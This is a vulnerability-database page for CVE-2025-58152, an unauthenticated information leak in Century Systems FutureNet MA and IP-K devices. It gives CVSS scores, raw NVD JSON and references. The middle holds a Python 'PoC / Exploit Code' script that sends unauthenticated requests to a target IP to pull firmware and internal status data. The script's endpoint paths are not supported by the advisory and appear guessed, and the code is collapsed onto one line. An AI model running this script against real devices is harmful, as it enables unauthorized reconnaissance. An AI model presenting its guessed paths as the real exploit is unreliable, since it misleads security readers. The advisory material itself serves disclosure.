Security Vulnerability Report
中文
CVE-2025-58152 CVSS 5.3 MEDIUM

CVE-2025-58152

Published: 2025-10-31 06:15:34
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

FutureNet MA and IP-K series provided by Century Systems Co., Ltd. put the firmware version and the garbage collection information on the internal web page. With some crafted HTTP request, they can be accessed without authentication.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

FutureNet MA series (all versions prior to vendor patch)
FutureNet IP-K series (all versions prior to vendor patch)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys def exploit_cve_2025_58152(target_ip, target_port=80): """ CVE-2025-58152 PoC - FutureNet MA/IP-K Information Disclosure This exploits an unauthenticated information disclosure vulnerability in Century Systems FutureNet devices. """ # Target URL for firmware version disclosure firmware_url = f"http://{target_ip}:{target_port}/firmware_info" # Target URL for garbage collection information gc_url = f"http://{target_ip}:{target_port}/gc_info" # Target URL for internal page internal_url = f"http://{target_ip}:{target_port}/internal/status" print(f"[*] Target: {target_ip}:{target_port}") print(f"[*] Exploiting CVE-2025-58152...") headers = { 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-58152-PoC)', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Connection': 'close' } urls_to_check = [firmware_url, gc_url, internal_url] for url in urls_to_check: try: print(f"\n[*] Requesting: {url}") response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f"[+] Success! Retrieved information from {url}") print(f"[+] Response Length: {len(response.text)} bytes") print(f"[+] Response Preview:\n{response.text[:500]}") # Check for firmware version in response if 'firmware' in response.text.lower() or 'version' in response.text.lower(): print("[+] Firmware/version information detected!") elif response.status_code == 401: print(f"[-] Authentication required for {url}") else: print(f"[-] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error connecting to {url}: {str(e)}") print("\n[*] PoC execution completed.") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 exploit_cve_2025_58152(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58152", "sourceIdentifier": "[email protected]", "published": "2025-10-31T06:15:34.150", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FutureNet MA and IP-K series provided by Century Systems Co., Ltd. put the firmware version and the garbage collection information on the internal web page. With some crafted HTTP request, they can be accessed without authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "references": [{"url": "https://jvn.jp/en/vu/JVNVU98191201/", "source": "[email protected]"}, {"url": "https://www.centurysys.co.jp/backnumber/common/jvnvu98191201.html", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.